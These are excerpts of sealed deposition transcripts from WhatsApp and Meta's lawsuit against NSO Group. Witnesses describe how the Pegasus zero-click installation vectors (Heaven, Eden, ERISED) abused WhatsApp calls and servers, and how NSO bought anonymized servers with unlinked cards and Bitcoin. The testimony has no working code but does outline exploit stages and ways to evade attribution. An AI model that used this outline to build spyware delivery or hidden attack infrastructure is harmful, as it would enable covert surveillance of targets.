A   The payload of stager was the same in Heaven and Eden.  The part that changed was the part that delivered the stager to --

Q   Right, so I think you testified earlier that with Heaven the stager was downloaded from a non-WhatsApp server.  Is that right?

MR. AKROTIRIANAKIS:  Objection, misstates testimony.

A   No.  No.  I stated that the privilege escalation payload --

Q   Got it.  So the stager even under Heaven was delivered via a WhatsApp message?

MR. AKROTIRIANAKIS:  Counsel, I know it is getting long in the day, but you've got to let him finish his answers.

A   In Heaven the stager payload was delivered using WhatsApp messages, yes.

Q   Okay.  And in Eden the stager payload was also delivered via WhatsApp message?

A   Yes.

Q   And in Heaven the PE payload was delivered not through WhatsApp servers, right?

Page 261

A   Right.

Q   And under Eden was the PE payload delivered via WhatsApp servers?

A   No.

Q   So what is the difference?

A   The difference is that in Heaven the stager payload is delivered using WhatsApp messages that go through non-WhatsApp relay servers, and in Eden the same payload is delivered using WhatsApp messages that go through WhatsApp relay servers.

Q   Got it.  So the distinction is with respect to through which servers the stager payload is delivered?

A   Which relay servers, yes.

Q   Which relay servers, got it. I think you said that was the principal difference between Heaven and Eden.  Are there any other important differences?

A   Not important enough that I remember.

Q   Nothing else that you remember?

A   No.

Q   Based on your preparation, nothing else that you are aware of?

66 (Pages 258 - 261)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 262

A   No.

(Exhibit 2039 marked for identification.)

Q   This is Exhibit 2039, which is a WhatsApp chat from May 12, 2019.  Again various participants.  In the second page Tomer Timor has a message.  Who is Mr. Timor?

A   He was, if I am right, at that stage presales employee.

Q   Presales?

A   Yes.

Q   He says in the sort of third paragraph down:

"So bottom line, Eden has finished its duty with us as a patch was done on the server side with the application it works with."

Do you recall this event?

A   Yes.

Q   And what does that refer to?  What is the event that is being described here?

A   Closure of ability to trigger the vulnerability on the target's WhatsApp client.

Q   So this reflect WhatsApp's remediation of the exploit that is described in the complaint?

MR. AKROTIRIANAKIS:  Objection, calls

Page 263

for a legal conclusion.  No foundation.

A   It refers to changes that were done, whether on the server side and the client side, in order to prevent us from triggering the vulnerabilities.

Q   And so after this point, after that update in May 12 or around May 12, 2019, was NSO able to use Eden after that point?

A   No.

Q   In the next paragraph down he said:

"I heard some sales managers talking in a dramatic way.  Your job is to make sure they remember that along the years NSO has proven time after time that one of its biggest value is the ability to 'survive' this harsh environment of the cat and mouse game."

Do you see that.

A   Yes.

Q   What does that refer to?

MR. AKROTIRIANAKIS:  Objection, no foundation.

A   This is a domain that you are not in control how long your capability will prolong at least for total control, and that is why he quotes cat and mouse game.  The ecosystem that you were

Page 264

working or acting makes changes eventually, forces you to adjust it.

Q   So NSO designs an exploit, the exploit gets shut down.  NSO designs another, right?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

Q   Is that generally the cat and mouse game?

MR. AKROTIRIANAKIS:  Misstates testimony.

A   This is the domain that you have to stay -- to keep and find new vulnerabilities after the systems get changed.

Q   That is just inherent to the domain in which NSO operates, right?

A   Yes.

Q   When something gets shut down, you have to work to develop another?

MR. AKROTIRIANAKIS:  Objection, misstates his testimony.

A   Eventually you have to provide -- you want to provide the 1 click and 0 click solutions to customers, and it doesn't relate to a specific service or application.

Page 265

Q   And at this point in May 2019 when the WhatsApp update prevented Eden from working did NSO have any 0 click Android solutions?

A   No.

Q   Did the R&D group subsequently find another 0 click installation vector for Android devices?

A   Yes.

Q   What was that?

A   ERISED.

Q   When was ERISED approved for production?

A   I don't recall the exact date.

Q   If we back to the exhibit we were looking at, in that same message from Mr. Timor he says:

"R&D are working hard on different directions.  Hopefully we will have good news soon, but please remember that our technological status is still great as we as a company have the resources to find something new in a relatively short time."

Do you agree with his statement, sir?

A   He was optimistic.

Q   Is it accurate that at this point,

67 (Pages 262 - 265)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 274

A   Owned and controlled, yes.

Q   And some of the numbers it looks like repeat.  Do you see that?  For instance ER11 shows up a couple of times on page 1?

A   Yes.

Q   And so that reflects that it is being tested more than once on the same device?

A   Yes.

Q   Do these reflect the results of the testing?

A   I don't see the results here.

Q   It looks like the document may be cut off.  It looks like there is another column that we can only see part of, right?

A   I expect it to be results for each attempt, but I don't see any results here.

Q   And typically in this type of document, based on your experience, you would expect to see results of the tests?

A   At least the outcome of the attempt.

Q   And you don't see that here, as produced?  I am not sure we got your answer.

A   I cannot see the result here.

Q   And the column that is headed "QA version" that would be the version of WhatsApp

Page 275

that is being run on the target device or the test device?

A   Yes.

Q   Okay.  When it says "Deviate installations", what does that mean?

A   Deviate was just part of the ERISED used -- part of the code.

Q   What part was that?

A   It was specific part for the exploitation flow, that was part of the general remote code execution capability in ERISED.

Q   Part of the remote code execution capability?

A   Yes.

Q   And so was Deviate the part of the code that worked with the Samsung vulnerability?

THE VIDEOGRAPHER:  Sorry, one second. It is okay.

Q   My question was was Deviate the part of the code that worked with the Samsung vulnerability?

A   Yes.

Q   And so this chart here reflects attempts to install Deviate on test devices?

Page 276

MR. AKROTIRIANAKIS:  Objection, misstates the document.

A   It is a list of attempts to define what is the statistical behavior of this part of the installation, yes.

Q   And so with respect to these WhatsApp versions, would that reflect that ERISED was being used at least at the time that those versions of WhatsApp were released?

MR. AKROTIRIANAKIS:  Objection, misstates the document.  Also vague.

A   Can you repeat the question, please?

Q   Yes.  With respect to those WhatsApp version numbers that go along with at least many of these tests, this would reflect that ERISED was being at least tested during the time that those WhatsApp versions were available?

A   Yes, tested, for sure.

Q   You can put that aside.  Are you aware that the Heaven exploit in its code included hard coded references to S.WhatsApp.net?

A   S.WhatsApp.net is a domain name.

Q   Mm hmm.  And are you aware that that was coded into the Heaven source code.

MR. AKROTIRIANAKIS:  Object to the form

Page 277

of the question.  Assumes facts not in evidence.

A   Which code.

Q   The Heaven code?

A   Yes, if I recall right, yes.

Q   Yes, it was coded in there?

A   Yes.

Q   And you said S.WhatsApp.net is a domain.  Is that right?

A   It is a domain name, yes.

Q   And where would that domain take the traffic?

A   I don't know.

Q   But a WhatsApp server, is that right?

A   This is, if I recall right, the domain name of the signaling WhatsApp server.

Q   Okay.  So that is -- S.WhatsApp.net is the domain name of a WhatsApp signaling server?

A   If I recall right.

Q   And so including S.WhatsApp.net in the Heaven source code would do what, with respect to the WhatsApp signaling server?

A   Communicate through that WhatsApp signaling server.

Q   It would direct the communication to

70 (Pages 274 - 277)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 278

that server specifically?

A   Yes.

Q   You, as part of the preparation of defendant's expert reports, you spoke with Mr. McGrough, right, defendant's expert?

MR. AKROTIRIANAKIS:  Objection to the form of the question.

A   I was interviewed by him.

Q   You were interviewed by him?

A   Yes.

Q   Did you tell him that the Heaven exploit hard coded the domain name of the WhatsApp signaling server?

A   I don't recall whether it was said or not.

Q   And defendants needed WhatsApp credentials to gain access to the WhatsApp servers.  Isn't that right?

A   We need WhatsApp credentials in order to connect to the real WhatsApp environment as a legitimate client.

Q   As if you were a legitimate client?

A   Yes.

Q   And without those credentials the installation vector wouldn't work?

Page 279

A   Without these credentials there is no source worth applying.

Q   Without those credentials you would be unable to communicate with the WhatsApp signaling server?

A   With WhatsApp at all.

Q   And defendants used the same coding protocol used by the WhatsApp signaling servers.  Isn't that right?

A   Coding protocol?

Q   Or coding language?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A   I don't know how -- what was implemented and what specific language.

Q   Are you familiar with a language called XMPP?

A   This is not a language, this is a protocol.

Q   I think I said protocol the first time and you corrected me?

A   You said language to implement the protocol.

Q   Let me repeat the question as I said it initially, which was defendants used the same

Page 280

coding protocol used by the WhatsApp signaling servers.  Correct?

A   This is the protocol that WhatsApp uses, so there is no other way to use any other protocol.

Q   Right.  WhatsApp uses a version of XMPP internally.  Is that right?

MR. AKROTIRIANAKIS:  Object to the form of the question.  No foundation.

A   WhatsApp uses XMPP as its communication protocol.

Q   And it uses specifically a version called fun XMPP.  Correct?

A   Yes.

MR. AKROTIRIANAKIS:  No foundation.

Q   And are you aware that defendants had a file also called FUN XMPP.PY?

A   Yes.

Q   And what is FUN XMPP.PY?

A   This is the implementation of the specific parts of the XMPP protocol which were required and used in very specific messages that we use in the installation vectors.

Q   So defendants used the FUN XMPP coding protocol that was used by WhatsApp

Page 281

internally, right?

MR. AKROTIRIANAKIS:  No foundation.

A   I don't know what WhatsApp used internal.  We used the protocol that enables us to build and send messages through WhatsApp system to the target client.

Q   So defendants used FUN XMPP specifically for the purposes of being able to communicate with WhatsApp servers?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A   There is no other way to communicate.

Q   So that is a yes, you use that language in order to communicate with the WhatsApp servers or that protocol rather?

A   We used it to communicate with the WhatsApp client on the target's device.

Q   Through the WhatsApp servers, right?

A   The messages are sent through the WhatsApp servers.

Q   Right, including the S.WhatsApp.net server that was hard coded into the Heaven code?

MR. AKROTIRIANAKIS:  Misstates his testimony.

71 (Pages 278 - 281)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 290

would NSO do as part of the demonstration of the Pegasus software?

A Use an ecosystem which was built for the demonstrations, for example, we saw the sales 3, and used company owned devices in order to demonstrate the behavior and the abilities on it.

Q When you say used company owned devices, you mean as the target, right?

MR. AKROTIRIANAKIS: Object to the form of the question.

A As the device on which the installation was conducted.

Q And so in terms of -- if we imagine a demonstration of Pegasus, that would work through WhatsApp's servers the same as if it was an actual use by a customer. Is that right?

A In terms of WhatsApp server, yes.

Q And is the same true with respect to testing, that that would operate through WhatsApp servers the same way as an actual use by a customer?

A Testing in an external environment?

Q Yes.

A Yes.

Q If you know, what service providers

Page 291

did defendants use to procure servers for use in connection with Pegasus?

A I don't know.

Q I believe that is a topic on which you are designated, but let me just check. The topic was "you or any relevant spyware's use of any third party server, including the AWS server to access plaintiff's computer", and your counsel said that you would testify as to defendant's understanding of the development of the accused technology in use between April 29, 2018 and May 10, 2020, including general information about defendant's use of third party servers in the accused technology. Are you prepared to testify on that topic?

MR. AKROTIRIANAKIS: Only if it was in the original topics. In light of his testimony?

MR. PEREZ-MARQUES: Do you have my question, Mr. Gazneli?

A I remember that the -- saying that I was testifying about the use.

Q The use of third party servers?

A Use, not which specific third party servers they were.

Q Okay. So you don't know which third

Page 292

parties were used?

A No.

Q Do defendants have policies about which service providers it uses for servers in connection with Pegasus?

MR. AKROTIRIANAKIS: Same objection. Beyond the scope of the designation.

A This is the same answer.

Q What is the same answer?

A I don't know.

Q Did defendants ever lease servers or other computer infrastructure from Quadranet Enterprises LLC?

MR. AKROTIRIANAKIS: Object to the form of the question. No foundation. Beyond the scope of designation.

A Can you repeat the question?

Q Did defendants ever lease servers or other computer infrastructure from Quadranet Enterprises LLC of Los Angeles, California?

A I don't know if a server was leased by that company or not.

Q If you wanted to find out the answer to that question, who would you ask?

A The White Services.

Page 293

Q Who is in charge of the White Services group?

A Ramon.

Q Ramon. Did defendants ever lease servers or other computer infrastructure from 365 Online Technology JSC in Hanoi, Vietnam?

A No.

Q Did defendants ever lease servers or other computer infrastructure from Green Cloud Technology?

A Again, it is under White Services responsibility.

Q When you say Ramon, you mean Ramon Eshkar?

A Yes.

Q Going back to the fingerprinting stage of the Hummingbird vectors, the information that NSO is obtaining regarding the target device, you gave a few examples, operating system, whether it is online, whether it has WhatsApp installed. Do you recall that, generally?

A Yes.

Q From where is NSO obtaining that information?

MR. AKROTIRIANAKIS: Object to the form.

74 (Pages 290 - 293)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 294

A   Except the parameter about whether the target has an active WhatsApp account, all the other information parts are from the target's client application.

Q   The target's WhatsApp client?

A   Yes.

Q   And does that go through the WhatsApp servers?

A   As any other message.

Q   And what about the information about whether the target is an active WhatsApp client? Where does that information come from?

A   This comes from WhatsApp server, as it comes for any other normal user when he enters new phone number in his contacts list.

Q   And when you say whether the target has an active WhatsApp account, what do you mean?

A   Activated WhatsApp account.

Q   That is different from whether like the app is in the foreground?

A   Yes.  Whether it ever has been activated WhatsApp account in a WhatsApp ecosystem.

Q   Apologies, because I know we covered this before, but for the Hummingbird vectors, did

Page 295

the fingerprinting work through the transmission of WhatsApp messages?

A   Yes.

Q   Okay.  And so prior to sending the WhatsApp message, that would tell you, the operating system, whether the app is in the foreground, would NSO first have to confirm from the WhatsApp server whether the user had an active WhatsApp account?

A   The first stage in the WhatsApp fingerprint was first checking that the target device number has an activated WhatsApp account. Then check the other three preliminary parameters, which is whether the target device is Android device, whether he is online, meaning it is connected to a network, and whether he is in foreground or not.

Q   And if the target was in foreground would you proceed with the installation?

A   No.

Q   And so before proceeding to the -- I will call it the second piece of the fingerprinting --

A   Yes.

Q   -- NSO would first have to confirm

Page 296

that the target had an activated WhatsApp account?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A   This is one of the parts in the fingerprinting.

Q   And is it right to think of it as sequential, that you would only proceed to sending a message to the target's WhatsApp client only after you had first confirmed that the client had an activated WhatsApp account?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A   There is no ability to send any message to a client which does not exist.

Q   So the first piece of information obtained as part of fingerprinting comes from the WhatsApp server?

A   Yes, as it comes to any other number that you have in list --

Q   And then the installation flow would not proceed -- would or would not proceed, depending on the answer, the information that NSO got from the WhatsApp server.  Right?

MR. AKROTIRIANAKIS:  Object to the form of the question.

Page 297

A   It was a decision of customer whether to proceed or not to the installation.

Q   If there is no WhatsApp activated account you could not proceed?

A   If there is no WhatsApp, no.  If there is a WhatsApp, the answer still may be no.

Q   And once the fingerprinting flow has confirmed that the client has an activated WhatsApp account, does it proceed automatically with the rest of the fingerprinting or is there a separate decision that gets made by an operator?

A   When you say "separate", which part do you mean?

Q   I mean one possibility is -- everything I just described happens in three milliseconds, and yes, the first step is to confirm whether there is an activated account, but then it immediately goes on to the remaining steps.  The other option is there is someone sitting at a computer, and they get a response that says this target has an activated account, and then they press a separate button that triggers the rest of the fingerprinting.  That is what I meant.

A   For information part, I explain

75 (Pages 294 - 297)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 298

whether he has -- the target has WhatsApp account activated, whether he is online or not, Android device, or is foreground or not, and done in one single attempt, but of course it depends on each part of preceding step.

Q   Got it.  That answers my question, thank you.

So once the fingerprinting is done, the next step is sending a call offer.  Is that right?  The next step of the installation flow?

A   Yes.

Q   And the call offer used an XOR cipher.  Is that right?

A   Yes.

Q   What is an XOR cipher?

A   It is an encryption that WhatsApp uses for communications.

Q   And so why did defendants call up or use an XOR cipher?

A   In order to encrypt the communication.

Q   And is that the non-standard encryption that we talked about before?

A   Back then it was not standard.

Q   Back when?

Page 299

A   In Heaven.

Q   And then what about with Eden and ERISED?

A   I don't recall whether this part was changed in Eden, but eventually it was changed and it became standard.

Q   For ERISED?

A   As I said, I don't recall the exact time that it changed from Eden, non-standard to standard.

Q   And why did defendants want to encrypt the message?

MR. AKROTIRIANAKIS:  Assumes facts not in evidence.

A   Part of measure to conceal the messages content.

Q   Can WhatsApp user using the standard WhatsApp client app send a call offer using an XOR cipher?

A   No.

Q   The call offer, at least for some of the Hummingbird vectors, manipulated the connecting tone DESC field.  Is that right?

A   Yes.

Q   And is that true of all three of the

Page 300

Hummingbird vectors?

A   No.

Q   Which ones is it true of?

A   For Heaven and Eden.

Q   And who at defendants came up with the idea to manipulate that particular field?

A   The research team.

Q   When did defendants come up with that idea?

A   During the research efforts that were done as part of the vulnerability research and the exploitation research.

Q   And roughly what was the time period when that work was being done?

A   Beginning of 2018 or end of 2017.

Q   And defendants, as part of at least the Eden and Heaven vectors, would insert a bash script in the connecting tone desc field?

A   Yes.

Q   And WhatsApp users using the official WhatsApp client app could not use the connecting tone desc field.  Is that right?

A   Right.

Q   The next step was inducing the victim's WhatsApp client to disclose whether It

Page 301

was 32 bit or 64 bit.  Is that right?

A   Yes.

Q   Is that true for all three Hummingbird vectors?

A   No.

Q   Just Eden and Heaven?

A   Yes.

Q   And defendants needed that information to determine next steps in the attack.  Is that right?

A   To determine which payload to continue with and which messages sequence to use.

Q   And defendants obtained that information, 32 bit versus 64 bit, through relay negotiation and bandwidth estimation.  Is that right?

A   Yes.

Q   And defendants would send an oversized bit width detection packet to the target device.  Is that right?

A   Right.

Q   And again that is for Eden and Heaven?

A   Yes.

Q   And that oversized bit width

76 (Pages 298 - 301)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 302

detection packet overwrote certain variables.  Is that correct?

A   On the target client application?

Q   Yes.

A   Yes.

Q   Including the AF variable, is that correct?

A   Yes.

Q   And whether the AF variable was overwritten determined whether it was a 32 bit phone or a 64 bit phone.  Is that right?

A   Yes.

Q   WhatsApp users using the official WhatsApp client could not send an oversized bit width detection packet, correct?

A   Correct.

Q   And could not overwrite the AF variable, correct?

A   Yes.

Q   And defendants obtained that information of 32 bit versus 64 bit from WhatsApp servers?

A   No.

Q   From the target device?

A   Yes.

Page 303

Q   Transmitted through WhatsApp servers?

A   Yes.

MR. AKROTIRIANAKIS:  Object to the form of that question.

Q   Defendants took that information and used it to design the next stages of the attack?

MR. AKROTIRIANAKIS:  Object to the form of the question.

Q   Such as choosing which payload to deliver?

MR. AKROTIRIANAKIS:  Same objection.

A   It was used to define how to proceed with the installation flow.

Q   And who made the decision as to how to proceed with the installation flow?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A   Who in terms of person?

Q   Sure.  Was that decision made by a person?

A   No.

Q   So how was that decision made?

A   By the installation server.

Q   It was made by the software

Page 304

developed by NSO?

A   Yes.

Q   A regular WhatsApp user using the WhatsApp client app can't obtain this 32 versus 64 bit information, can it?

A   Again the question?

Q   A regular WhatsApp user using the WhatsApp client app cannot obtain this information?

A   They can obtain it by other means on the device.

Q   But not through the WhatsApp client app?

A   Not through WhatsApp client app.

Q   And WhatsApp servers are not intended to disclose that information, is that right?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A   WhatsApp servers are intended to block any unusual activity they would like to detect and block.

Q   After determining the bit width, defendants sent a duplicate call offer message.  Is that right?

Page 305

A   Yes.

Q   And that was to reset the target device's internal memory?

MR. AKROTIRIANAKIS:  Object to the form of the question.

A   You would need to define what internal memory you refer to.

Q   Can you help me with that?  You are the expert.

A   It was used to reset the specific memory area that was used in the application, WhatsApp application.

Q   And that would allow the next stage of the attack?

A   Yes.

Q   And WhatsApp users using the official WhatsApp client could not send the duplicate call offer message.  Right?

A   Right.

Q   Did you explain those steps to defendants' expert?

A   I don't recall reviewing each and every step of the steps.

Q   The next step was to calculate the location of the LIB WhatsApp.SO file, right?

77 (Pages 302 - 305)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 334

CERTIFICATE OF COURT REPORTER

I, AILSA WILLIAMS, an Accredited LiveNote Reporter, hereby certify that Tamir Gazneli was duly sworn, that I took the Stenograph notes of the foregoing deposition and that the transcript thereof is a true and accurate record transcribed to the best of my skill and ability. I further certify that I am neither counsel for, related to, nor employed by any of the parties to the action in which the deposition was taken, and that I am not a relative or employee of any attorney or counsel employed by the parties hereto, nor financially or otherwise interested in the outcome of the action.

Before completion of the deposition, review of the transcript was requested. Any changes made by the deponent (and provided to the reporter) during the period allowed are appended hereto.

*Ailse Yh Williams*

AILSA WILLIAMS
Dated: September 6, 2024.

Page 335

ERRATA

Deposition of Tamir Gazneli
(Please show all corrections on this page, not in the transcript.)
Page/Line No.      Description      Reason for change

Signed: ...................
Name:
Date: ..................

85 (Pages 334 - 335)

# EXHIBIT 8

## FILED UNDER SEAL

HIGHLY CONFIDENTIAL

Page 1

UNITED STATES DISTRICT COURT
NORTHERN DISTRICT OF CALIFORNIA
OAKLAND DIVISION

- - - - - - - - - - - - - - - - - - -

                                    )
WHATSAPP INC., a Delaware           )
corporation, and META PLATFORMS, )
INC., a Delaware corporation,       )
                                    )
                    Plaintiffs,  )
                                    )  Case No.:
v.                                  )  4:19-cv-07123-PJH
                                    )
NSO GROUP TECHNOLOGIES LIMITED    )
and Q CYBER TECHNOLOGIES LIMITED,)
                                    )
                    Defendants.  )
- - - - - - - - - - - - - - - - - - -

Highly Confidential - Subject to Protective Order

VIDEO DEPOSITION OF RAMON ESHKAR

Tuesday, August 27, 2024

Commencing:  9:17 a.m. BST

Davis Polk & Wardwell LLP
5 Aldermanbury Square
London, EC2 7HR
United Kingdom

Court Reporter:
Chanelle Malliff, CLR

HIGHLY CONFIDENTIAL

Page 150

A. Yes.

Q. Do those connect to the NOC?

MR. AKROTIRIANAKIS: Objection: foundation.

THE WITNESS: So we do provide email access and phone access I just don't know if those are the exact email and phone number at the time since -- I don't know again it's not our contract so I don't know if there was something there, but we do provide email access and phone number. Today there is a dedicated system for this communication so email is hardly ever used.

BY MR. BLOCK:

Q. What is that dedicated system called?

A. It's the NSD. NSD.

Q. What does NSD stand for?

A. Okay. I think it's NSO support -- I don't recall exactly but something like that.

Q. Something like that?

A. It's initials that describe a support system.

Q. What function do the tunnels and VPS you just mentioned serve relative to Pegasus?

A. So to the best of my knowledge they are part of the infrastructure required in order to connect between the system to the outside and back and forth.

Q. Earlier we talked about the white services

Page 151

department, do you recall that?

A. Yes.

Q. And one of the things that the white services department will do is set up VPS servers for a customer; is that accurate?

A. They will not set it up. They will procure the service. There is another team that will set it up.

Q. Okay so let me start with the procurement. And to set the stage a customer is setting up an installation of Pegasus and requires VPS as part of the infrastructure to operate Pegasus; is that accurate?

MR. AKROTIRIANAKIS: Objection. Object to the form of the question. Vague. No foundation.

THE WITNESS: So can you please clarify?

BY MR. BLOCK:

Q. Yeah. I think you testified to the effect that customers need VPS to operate Pegasus. Is that accurate?

MR. AKROTIRIANAKIS: Objection: misstates his testimony.

THE WITNESS: VPS are part of the infrastructure required for the system.

BY MR. BLOCK:

Page 152

Q. And one job of the white services department is to procure anonymized VPS; is that accurate?

A. This is part of the job.

Q. And what steps are involved when someone in the white services department procures anonymized VPS?

MR. AKROTIRIANAKIS: Objection: no foundation.

THE WITNESS: They will pick a provider that provides the VPS, and they will choose the service that they want from that provider, and they will have to follow the procurement process required according to that specific supplier.

BY MR. BLOCK:

Q. In what sense is the service anonymized?

A. In the sense that it cannot be linked to either the customer or NSO.

Q. And how do defendants achieve that anonymization with respect to VPS?

MR. AKROTIRIANAKIS: Objection: foundation.

THE WITNESS: They use an anonymized -- I don't know what to call it -- way in order to gain a service.

BY MR. BLOCK:

Q. And I would like to know what you know about

Page 153

the details of that anonymized way. Can you explain it?

MR. AKROTIRIANAKIS: Objection: foundation.

THE WITNESS: So to the best of my knowledge they will use financial means which are not directly related to the customer or to the company. That's I think the main point here that will allow them to establish an anonymized VPS account.

BY MR. BLOCK:

Q. Can you give me an example of financial means not directly related to the customer or the company that the white services department uses for these purposes?

A. It can be like a credit card.

Q. A credit card registered in the name other than the customer or defendants I presume; is that accurate?

A. Sounds to me, yes.

Q. And do you know the details about how the white services department procures credit cards and names not related to defendants or their customers?

MR. AKROTIRIANAKIS: Objection: foundation.

THE WITNESS: How exactly they are doing that, no.

BY MR. BLOCK:

39 (Pages 150 - 153)

HIGHLY CONFIDENTIAL

Page 154

Q. Okay. Does NSO use cryptocurrency as a financial means for setting up anonymized VPS?

MR. AKROTIRIANAKIS: Objection: foundation.

THE WITNESS: If I'm not mistaken, yes.

BY MR. BLOCK:

Q. Bitcoin for example?

MR. AKROTIRIANAKIS: Foundation.

THE WITNESS: Bitcoin for example.

BY MR. BLOCK:

Q. Have you ever heard of Quadranet?

A. Sounds familiar.

Q. Is Quadranet familiar to you as a VPS provider?

A. No, I don't recall no.

Q. Okay. Do you recall anything about Quadranet?

A. Not that I recall, no.

Q. Have you heard of Green Cloud VPS?

A. I heard the name but I don't have more details than that.

Q. Do you recall having heard it in connection with your work for defendants?

A. Yes.

Q. And what else do you recall about how you heard the name, if anything?

Page 155

A. Just the name. I mean nothing in particular.

Q. How about the name Choopa, C-H-O-O-P-A, is that familiar to you?

A. No.

Q. Can you name any VPS servers that you know defendants use when setting up anonymized VPS for customers?

MR. AKROTIRIANAKIS: Objection: foundation.

THE WITNESS: Not that come in mind.

BY MR. BLOCK:

Q. Do customers select the VPS provider, or does -- do defendants?

MR. AKROTIRIANAKIS: Objection: overboard. No foundation.

THE WITNESS: Some customers choose to set up the infrastructure themselves so they will do it A to Z.

BY MR. BLOCK:

Q. I'm going to ask a question that I think your counsel has an objection to but I just want to be clear for the record. Can you name customers that handled the infrastructure themselves A to Z?

MR. AKROTIRIANAKIS: Are you asking him a yes or no question or are you asking him to name the customers?

Page 156

MR. BLOCK: Let's start with yes or no.

BY MR. BLOCK:

Q. Are you able to name customers who handle the installation and infrastructure themselves?

A. Yes.

Q. Will you please identify them for the record?

MR. AKROTIRIANAKIS: Okay, that I will instruct him not to answer.

BY MR. BLOCK:

Q. Are you able to name customers for whom defendants performed the infrastructure procurement and installation?

A. If I can?

MR. AKROTIRIANAKIS: He's asking you yes or no, if you can.

A. Yes, I can.

BY MR. BLOCK:

Q. Will you please identify for the record the customers for whom defendants did the infrastructure installation that you are able to name?

MR. AKROTIRIANAKIS: Again I'm going to instruct him not to answer for the same reason.

BY MR. BLOCK:

Q. Can you tell me how many customers defendants have performed infrastructure installation for?

Page 157

MR. AKROTIRIANAKIS: Objection: foundation.

THE WITNESS: Throughout which period of time?

BY MR. BLOCK:

Q. Let's start with the entire life of the company?

MR. AKROTIRIANAKIS: Objection: foundation.

THE WITNESS: I don't have exact number in mind.

BY MR. BLOCK:

Q. Can you estimate it by order of magnitude?

MR. AKROTIRIANAKIS: Objection: foundation.

THE WITNESS: More than ten. I mean tens.

BY MR. BLOCK:

Q. Tens?

A. Around.

Q. More than 100?

MR. AKROTIRIANAKIS: Objection: foundation.

THE WITNESS: I don't know.

BY MR. BLOCK:

Q. You can't rule it out, not sure.

MR. AKROTIRIANAKIS: Objection: foundation. Compound. Vague.

THE WITNESS: I need to count the number that we had each career and then to sum it. So ...

40 (Pages 154 - 157)

HIGHLY CONFIDENTIAL

Page 270

I meant is that if there is a demonstration for a customer then we would like to show that part of the information that the system can extract is WhatsApp-related, therefore we will have a test device with a WhatsApp account with basic communication so during the demo we can show that we can collect the data.

BY MR. AKROTIRIANAKIS:

Q. You just used the term WhatsApp-related. Is there any other relation to WhatsApp, other than demonstrating the ability to extract WhatsApp messages from the demo client phone that you're using?

MR. BLOCK: Objection to form.

THE WITNESS: Come again? I lost you. It was very long.

Q. Sorry. In your answer you just used the term WhatsApp-related. Other than demonstrating the ability to extract a WhatsApp message from the demo phone that you're talking about, is there any other relation to WhatsApp?

MR. BLOCK: Objection to form.

THE WITNESS: No.

MR. AKROTIRIANAKIS: All right, thank you.

MR. BLOCK: I assume, Joe, you'll permit

Page 271

questions about that testimony but not about other topics?

MR. AKROTIRIANAKIS: I asked two questions. If you've got two questions, or one question as some kind of recross-examination, then you can ask that but we're well beyond 7 hours and it's well after 7 p.m. now.

MR. BLOCK: I do not have re-cross. I have many other questions.

MR. AKROTIRIANAKIS: Then if you don't have any re-cross then I think we're done.

MR. BLOCK: Then we obviously object to the closure of the deposition but we'll allow it to proceed, subject to that objection.

VIDEOGRAPHER: Going off the record. The time is 19:08. End of media card 6, volume 1 and this is the end of the video deposition of Ramon Eshkar. If I could ask about the video and transcript, if you could state that please?

MR. AKROTIRIANAKIS: Is it possible if I could tell you after because someone else manages that and I inevitably will mess it up.

MR. BLOCK: Same answer.

(Whereupon, the deposition concluded at 7:09 pm)

Page 272

CERTIFICATE OF COURT REPORTER

I, CHANELLE M.L. MALLIFF, a Certified LiveNote Reporter, Certified Shorthand Stage IV stenographic reporter, RPR and CRR (*NCRA 2003 and 2004), hereby certify that:

RAMON ESHKAR appeared on Tuesday, August 27, 2024, agreed to tell the truth, the whole truth, and nothing but the truth, under the penalties of perjury, and was thereupon examined by counsel; that the testimony of RAMON ESHKAR was recorded by me stenographically and was thereafter transcribed by me; that the foregoing transcript is a true, accurate and verbatim record to the best of my skill and ability.

I further certify that I am not a relative or employee of any party to the action; nor am I an employee or relative of any attorney or counsel to any party to the action; nor am I in any way financially or otherwise interested in the outcome of the action.

CHANELLE M.L. MALLIFF
CLR, CSSIV(NZ)

Page 273

Joseph N. Akrotirianakis, Esq.
jakro@kslaw.com
August 30, 2024
RE: Whatsapp LLC., Et Al. v. NSO Group Technologies Limited, Et Al.
8/27/2024, Ramon Eshkar (#6878149)

The above-referenced transcript is available for review.

Within the applicable timeframe, the witness should read the testimony to verify its accuracy. If there are any changes, the witness should note those with the reason, on the attached Errata Sheet.

The witness should sign the Acknowledgment of Deponent and Errata and return to the deposing attorney. Copies should be sent to all counsel, and to Veritext at cs-ny@veritext.com

Return completed errata within 30 days from receipt of testimony.

If the witness fails to do so within the time allotted, the transcript may be used as if signed.

Yours,
Veritext Legal Solutions

69 (Pages 270 - 273)

# EXHIBIT 10

## FILED UNDER SEAL

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 1

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION

--------------------------------X

WHATSAPP INC.                    :

a Delaware corporation, and      :

META PLATFORMS INC,              :

a Delaware Corporation:

            Plaintiffs       :

        v.                   :    Case No.

NSO GROUP TECHNOLOGIES LTD    :    4:19-cv-07123-PJH

and                          :

Q CYBER TECHNOLOGIES LTD       :

            Defendants       :

--------------------------------X

HIGHLY CONFIDENTIAL - ATTORNEYS' EYES ONLY

Deposition of YARON SHOHAT

LONDON

THURSDAY, AUGUST 29TH, 2024

9:19 A.M. BST

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 66

A. Yes.

Q. And then it says:

"Pegasus 2.70 (android and P2 platform)."

Do you see that?

A. Mm-hm.

Q. Do you know what "P2 platform" means in that line?

MR. AKROTIRIANAKIS: Objection. Foundation.

A. I am not sure.

Q. Do you recall using the term "P2 platform" in your work at NSO?

